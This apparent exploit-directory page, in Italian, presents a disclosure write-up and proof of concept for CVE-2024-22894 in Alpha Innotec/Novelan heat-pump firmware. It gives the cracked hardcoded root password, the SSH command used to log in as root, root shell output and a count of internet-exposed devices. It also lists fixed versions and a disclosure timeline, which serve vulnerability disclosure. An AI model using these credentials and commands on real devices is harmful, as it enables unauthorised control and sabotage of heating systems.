Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-22894 — Proof-of-concept exploit per CVE-2024-22894, che dimostra l'estrazione della password di root crittografata con 3DES dal firmware delle pompe di calore Alpha Innotec/Novelan, consentendo l'accesso SSH a dispositivi IoT vulnerabili. | Kitploit
Strumenti/GitHubGitHub/jaarden/cve-2024-22894
Sicurezza Sistemi EmbeddedPassword CrackingSicurezza IoTAnalisi delle VulnerabilitàExploitSicurezza di ReteCrittografiaSicurezza Hardware e IoTAnalisi del Firmware
GitHubjaarden/cve-2024-22894

CVE-2024-22894

Proof-of-concept exploit per CVE-2024-22894, che dimostra l'estrazione della password di root crittografata con 3DES dal firmware delle pompe di calore Alpha Innotec/Novelan, consentendo l'accesso SSH a dispositivi IoT vulnerabili.

312 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

CVE-2024-22894

Scaricato l'ultima versione del firmware della pompa di calore wp2reg-V3.88.0-9015 di https://www.heatpump24.com/DownloadArea.php. All'interno di questo firmware c'è un file chiamato: wp2reg-V3.88.0-9015\wp2reg-AlphaInnotech-prod\home.wp2reg-V3.88.0-9015_221213\share\shadow

Questo contiene una password crittografata 3DES root:MEfgX2vrPJzuE:0:0:99999:7::: dell'utente root di sistema e quando decifrata/scoperta (in 5 secondi) mostra la password eschi.

Quando colleghi la mia pompa di calore alla rete tramite un cavo di rete, puoi usare l'utente 'root' e la password trovata per accedere al servizio SSH disponibile.

root@kitploit:~
> ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c aes256-cbc root@$IP
$IP's password: eschi
# id
uid=0(root) gid=0 groups=0
# uname -a
Linux [...]  2.6.33.20 #3 PREEMPT Wed Oct 24 14:25:34 CEST 2018 armv5tejl GNU/Linux

Questa vulnerabilità è applicabile a tutte le pompe di calore Alpha Innotec e Novelan, con controller Luxtronic. È stata verificata e affrontata da AIT Deutschland, l'OEM di Alpha Innotec e Novelan, e la vulnerabilità è presente nelle seguenti versioni del firmware:

  • Versioni precedenti alla V2.88.3
  • Versioni precedenti alla V3.89.0
  • Versioni precedenti alla V4.81.3

La pompa di calore deve essere collegata alla rete tramite una connessione LAN (RJ-45) per poterla sfruttare. Secondo Shodan ci sono ancora 47 pompe di calore connesse a Internet con la stessa versione SSH e impronta digitale, che potrebbero essere compromesse usando questo exploit.

Una volta sfruttata, potrebbe causare molti danni, modificando le impostazioni o rimuovendo l'intera configurazione/software, causando il malfunzionamento o il crash della pompa di calore. Ad esempio, la directory home contiene i seguenti file che potrebbero essere interessanti per un attaccante:

root@kitploit:~
# ls -alh /home
total 7448
drwxr-xr-x    5 root     0           4.8K Jan 12 08:59 .
drwxr-xr-x   14 root     0            992 Aug  1  2011 ..
drwxr-xr-x    3 root     0            224 Jan  1  1970 .update
-rw-rw-rw-    1 root     0          92.3K Jul 20  2022 10Min_1
-rw-rw-rw-    1 root     0          92.3K Sep 15  2022 10Min_2
-rwxrwxrwx    1 root     0          22.3K Jan 13  2021 ASB.bin
-rwxrwxrwx    1 root     0          23.3K Jul 15  2019 ASB_BL_Switch.bin
-rwxrwxrwx    1 root     0          22.1K Jul 15  2019 ASB_bootloader.bin
-rwxrwxrwx    1 root     0           1.2K Jun 16  2021 Defines.txt
-rwxrwxrwx    1 root     0          15.7K Jun 14  2021 HZIO.lin
-rw-rw-rw-    1 root     0            648 Jan  3 18:55 Info.dti
-rwxrwxrwx    1 root     0          15.3K Jul 24  2020 LD2AG.lin
-rwxrwxrwx    1 root     0          37.5K Jul 15  2019 LWD.lin
-rwxrwxrwx    1 root     0          26.8K Feb  8  2021 LWD45.lin
-rwxrwxrwx    1 root     0          38.8K Jul 15  2019 LWD90.lin
-rwxrwxrwx    1 root     0          37.9K Jul 15  2019 LWDRev.lin
-rwxrwxrwx    1 root     0          40.0K Jun 16  2021 LuxConst.sqlite
-rwxrwxrwx    1 root     0          26.9K Jul 24  2020 MSW_15.lin
-rwxrwxrwx    1 root     0          28.4K Jul 24  2020 MSW_Inverter.lin
-rw-rw-rw-    1 root     0         435.2K Jan 12 08:59 NewProc
-rw-rw-rw-    1 root     0           8.8K Jan  1 01:00 ParamArchive_1704067200
[...]
-rw-rw-rw-    1 root     0           8.8K Jan 12 01:00 ParamArchive_1705017600
-rwxrwxrwx    1 root     0          96.9K Jul 15  2019 SEC.bin
-rwxrwxrwx    1 root     0          31.6K Jul 15  2019 SWP.lin
-rwxrwxrwx    1 root     0          30.6K Jul 15  2019 SWPH.lin
-rwxrwxrwx    1 root     0          30.4K Jul 15  2019 SWPH291.lin
drwxrwxrwx    2 root     0            648 Apr 25  2023 Webserver
-rwxrwxrwx    1 root     0           5.0M Jun 16  2021 appl
-rwxrwxrwx    1 root     0            147 Jul 15  2019 appl.cfg
-rw-rw-rw-    1 root     0           8.8K Jan 12 08:59 appl_param1
-rw-rw-rw-    1 root     0           8.8K Jan 12 06:59 appl_param2
-rwxrwxrwx    1 root     0           9.4K Jul 15  2019 bootloader.lin
-rw-r--r--    1 root     0          20.0K Jan  1 05:10 default.sqlite
-rw-r--r--    1 root     0              0 Jan  1  1970 default.sqlite-wal
-rw-rw-r--    1 root     0             56 Sep 15  2022 errlog
-rw-r--r--    1 root     0          42.9K Apr  1  2011 firmware
-rwxrwxrwx    1 root     0            391 Jul 15  2019 index.html
-rwxrwxrwx    1 root     0          35.2K Jun 16  2021 lang_CR
[...
-rwxrwxrwx    1 root     0          37.8K Jun 16  2021 lang_tr
drwxr-xr-x    2 root     0            360 Jan  1  1970 share
-rwxrwxrwx    1 root     0             37 Jul 15  2019 timezone
-rwxrwxrwx    1 root     0           1.1K Jul 15  2019 udhcpc.script

Versioni corrette

  • V2.88.3 o superiore
  • V3.89.0 o superiore
  • V4.81.3 o superiore

Cronologia

  • [13-06-2023] Divulgazione responsabile a: AIT-Deutschland (OEM), Alpha Innotec (Marchio), Novelan (Marchio), Nathan (Rivenditore olandese).
  • [19-06-2023] Risposta da AIT-Deutschland per programmare un incontro.
  • [22-06-2023] Incontro con AIT-Deutschland riguardo alla vulnerabilità.
  • [01-07-2023 - 01-12-2023] AIT-Deutschland sviluppa una correzione per la vulnerabilità
  • [14-12-2023] Raccolta di informazioni per i dettagli CVE.
  • [10-01-2024] Incontro con AIT-Deutschland sulla presentazione dei dettagli CVE.
  • [26-01-2024] ID CVE CVE-2024-22894 assegnato.
  • [30-01-2024] CVE-2024-22894 pubblicato.

Crediti

I crediti vanno ad AIT-Deutschland per aver preso sul serio questo problema e averlo risolto con priorità.

Scarica lo strumento